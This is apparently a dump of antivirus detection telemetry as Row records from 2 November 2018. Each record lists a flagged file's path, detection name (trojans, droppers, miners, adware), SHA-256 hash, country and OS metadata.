  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7186362\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\JavaSetup_2512067144.exe', parentsize=2446409, timestamp='2018-11-02T22:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\SWDE\\C-GML\\bin\\transfer.EXE', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:23:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='shellexe.exe', filepath='\\?\\G:\\PLC程式\\RPGA\\bin\\Shellexe.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='41b053659b30b0b5741b3603785a024bb4b87f083cbc247a224c273aa599f17e', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A59236033242F343FABED956D3E4D7B86A6FC5833ACAF0EB6567AD91B812FBA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181351-c1db2d9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-181351-C1DB2D9E', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:13:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1061d0e1699199ae5f33c83ea677e2e346b19665296a6284a082f75c1030e7ef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4494210\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:33:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174115-0b27e153', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e78b00be\\AVSCAN-20181102-173932-FE1A184E\\AVSCAN-20181102-174115-0B27E153', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:41:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055942-766a41d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055942-766A41D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175352-cb52e79e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b75b2a24\\AVSCAN-20181102-171048-3B26D367\\AVSCAN-20181102-175352-CB52E79E', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:53:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050331-9d183f8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050331-9D183F8E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052251-509c5589', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052251-509C5589', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143520-3c67dfb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143520-3C67DFB1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:kxhmwh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:kxhmwh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='59343af4d3ecb22854546c8e8a8f1c266a4a2a20abfb2a94e423426cfc765d91', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T15:00:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160346-1642ce81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160346-1642CE81', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000006ee', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp000006ee', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061237-44471aa7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061237-44471AA7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052217-3c5995df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052217-3C5995DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053120-7f878255', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053120-7F878255', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132524-30acae70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132524-30ACAE70', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:28:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050705-1cbb9eb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050705-1CBB9EB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134753-2b3e586e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134753-2B3E586E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053130-85f4ad8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053130-85F4AD8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134635-1ce19f9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134635-1CE19F9F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T121502-01259/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:00:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054918-0229a13f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054918-0229A13F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060850-bcc62106', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060850-BCC62106', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055516-d79fa12c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055516-D79FA12C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061723-ee8caf30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061723-EE8CAF30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062643-3cbb7c49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062643-3CBB7C49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061950-4686271c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061950-4686271C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053531-1585e88e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053531-1585E88E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055315-8fd7bd76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055315-8FD7BD76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061135-1f8c90b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061135-1F8C90B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062520-0ae0ab28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062520-0AE0AB28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053508-0793c57f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053508-0793C57F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055551-ec7a52e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055551-EC7A52E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053247-b38a19f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053247-B38A19F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052456-9b00ff8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052456-9B00FF8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051626-6abf2b17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051626-6ABF2B17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051308-f50b5d1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051308-F50B5D1F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052451-983e3c84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052451-983E3C84', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055057-3d1abad1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055057-3D1ABAD1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061031-f94d54e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061031-F94D54E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052920-3813a47c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052920-3813A47C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052922-3955ab48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052922-3955AB48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061912-2fcbbf37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061912-2FCBBF37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:11Z'), dt=datetime.date(2018, 11, 2)),
